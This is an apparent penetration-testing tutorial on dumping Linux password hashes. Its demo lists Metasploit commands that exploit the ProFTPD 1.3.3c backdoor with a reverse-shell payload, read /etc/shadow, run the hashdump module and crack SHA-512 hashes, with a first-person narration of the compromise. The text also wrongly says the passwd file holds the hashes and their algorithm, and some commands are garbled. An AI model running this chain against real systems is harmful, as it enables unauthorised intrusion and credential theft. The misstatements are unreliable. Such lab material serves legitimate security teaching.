Dumping Hashes

Linux supports multiple users, allowing them to access the system at the same time. While this is useful, it also introduces security risks since more user accounts mean more potential entry points for attackers.

All user account details are stored in the passwd file, located at: /etc/passwd

However, this file does not store user passwords, as it is readable by any user on the system. Instead, all encrypted passwords are stored in the shadow file, located at: /etc/shadow

The shadow file is only accessible by the root user, which is a crucial security feature. This restriction prevents other users from viewing or accessing the hashed passwords, keeping the system more secure.

The Hashes

The passwd file provides information about the hashing algorithm used for storing passwords and the password hash itself. This is useful because it allows us to identify the hashing method and assess its strength.

We can determine the hashing algorithm by checking the number inside the dollar signs ($) after the username. For example:

• $1$ → MD5

• $2a$ → Blowfish

• $5$ → SHA-256

• $6$ → SHA-512

By recognizing these identifiers, we can understand the security level of the stored passwords.

Demo

nmap -sV [TARGET IP]

msfconsole -q
setg RHOSTS [TARGET IP]
use exploit/unix/proftpd_133c_backdoor
set payload payload/cmd/unix/reverse
set LHOST
exploit -z

session -u 1

cat /etc/shadow

search hashdump
use post/linux/gather/hashdump
set SESSION 1
exploit

use auxiliary/analyze/crack_linux
set SHA512 true
run

I begin by scanning the target system to identify running services and their versions, looking for any known vulnerabilities that I can exploit. Once I gather enough information, I launch Metasploit and configure my target settings. I then attempt to exploit a known backdoor vulnerability in ProFTPD 1.3.3c, which allows me to gain unauthorized access to the system through a reverse shell.

After successfully establishing a shell, I upgrade my session to Meterpreter, giving me more control over the compromised system. With elevated access, I navigate to the /etc/shadow file, which stores password hashes, confirming that I have root privileges. To extract more credentials, I use a hash-dumping module to collect all available password hashes from the system.

Once I have the hashes, I move on to the final step—attempting to crack them. I use an auxiliary module to analyze and crack Linux password hashes, focusing on those using the SHA-512 algorithm. If successful, this would allow me to access user accounts directly, further escalating control over the system. Through this process, I move from reconnaissance to full compromise, demonstrating how an unpatched vulnerability can lead to complete system takeover.